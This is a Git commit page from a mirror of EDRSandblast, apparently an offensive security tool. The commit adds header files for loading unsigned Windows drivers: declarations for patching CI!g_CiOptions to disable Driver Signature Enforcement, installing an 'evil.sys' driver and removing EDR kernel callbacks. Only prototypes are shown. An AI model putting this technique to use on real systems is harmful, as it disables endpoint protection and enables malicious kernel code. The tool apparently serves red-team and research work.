Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-10 01:17:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add feature : loading unsigned driver

Browse Source
This commit is contained in:
v1k1ngfr
2022-12-25 01:07:15 +01:00
committed by Maxime Meignan
parent 0bbe76aab1
commit 7be844b518
16 changed files with 427 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast/Includes/CiOffsets.h
+37
View File
@@ -0,0 +1,37 @@
/*
--- Functions to bypass Digital Signature Enforcement by disabling DSE through patching of the g_CiOptions attributes in memory.
--- Full source and credit to https://j00ru.vexillium.org/2010/06/insight-into-the-driver-signature-enforcement/
--- Code adapted from: https://github.com/kkent030315/gdrv-loader/tree/1909_mitigation
*/
#pragma once
#include <Windows.h>
enum CiOffsetType {
g_CiOptions = 0,
_SUPPORTED_CI_OFFSETS_END
};
union CiOffsets {
// structure version of Ci.dll's offsets
struct {
// Ci.dll's g_CiOptions
DWORD64 g_CiOptions;
} st;
// array version (usefull for code factoring)
DWORD64 ar[1];
};
union CiOffsets g_ciOffsets;
// Return the offsets of CI!g_CiOptions for the specific Windows version in use.
void LoadCiOffsetsFromFile(TCHAR* CiOffsetFilename);
void SaveCiOffsetsToFile(TCHAR* CiOffsetFilename);
void LoadCiOffsetsFromInternet(BOOL delete_pdb);
LPTSTR GetCiVersion();
LPTSTR GetCiPath();
EDRSandblast/Includes/DriverOps.h
+5
View File
@@ -23,3 +23,8 @@ BOOL InstallVulnerableDriver(TCHAR* driverPath);
BOOL UninstallVulnerableDriver(void);
BOOL IsDriverServiceRunning(LPTSTR driverPath, LPTSTR* serviceName);
// evil driver install
TCHAR* GetEvilDriverServiceName(void);
void SetEvilDriverServiceName(_In_z_ TCHAR* newName);
BOOL InstallEvilDriver(TCHAR* driverPath);
BOOL UninstallEvilDriver(void);
EDRSandblast/Includes/KernelCallbacks.h
+3
View File
@@ -94,3 +94,6 @@ void RemoveEDRImageNotifyCallbacks(struct FOUND_EDR_CALLBACKS* edrDrivers, BOOL
BOOL EnumEDRNotifyRoutineCallbacks(struct FOUND_EDR_CALLBACKS* edrDrivers, BOOL verbose);
void RemoveEDRNotifyRoutineCallbacks(struct FOUND_EDR_CALLBACKS* edrDrivers);
// Helps at locating some DLL in the kernel, for example CI.dll
DWORD64 GetNotifyRoutineAddress(enum NtoskrnlOffsetType nrt);
EDRSandblast/Includes/KernelDSE.h
+11
View File
@@ -0,0 +1,11 @@
#pragma once
#pragma comment(lib, "ntdll.lib")
#define DEFAULT_EVIL_DRIVER_FILE TEXT("evil.sys")
#if !defined(PRINT_ERROR_AUTO)
#define PRINT_ERROR_AUTO(func) _tprintf_or_not(TEXT("[!] ERROR ") TEXT(__FUNCTION__) TEXT(" ; ") func TEXT(" (0x%08x)\n"), GetLastError())
#endif
BOOLEAN IsCiEnabled();
DWORD64 FindCIBaseAddress(BOOL verbose);
BOOL patch_gCiOptions(PVOID CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue);
EDRSandblast/Includes/KernelUtils.h
+1
View File
@@ -5,3 +5,4 @@ DWORD64 FindNtoskrnlBaseAddress(void);
TCHAR* FindDriverName(DWORD64 address, _Out_opt_ PDWORD64 offset);
TCHAR* FindDriverPath(DWORD64 address);
DWORD64 GetKernelFunctionAddress(LPCSTR function);
TCHAR* FindDriverName(DWORD64 address, _Out_opt_ PDWORD64 offset);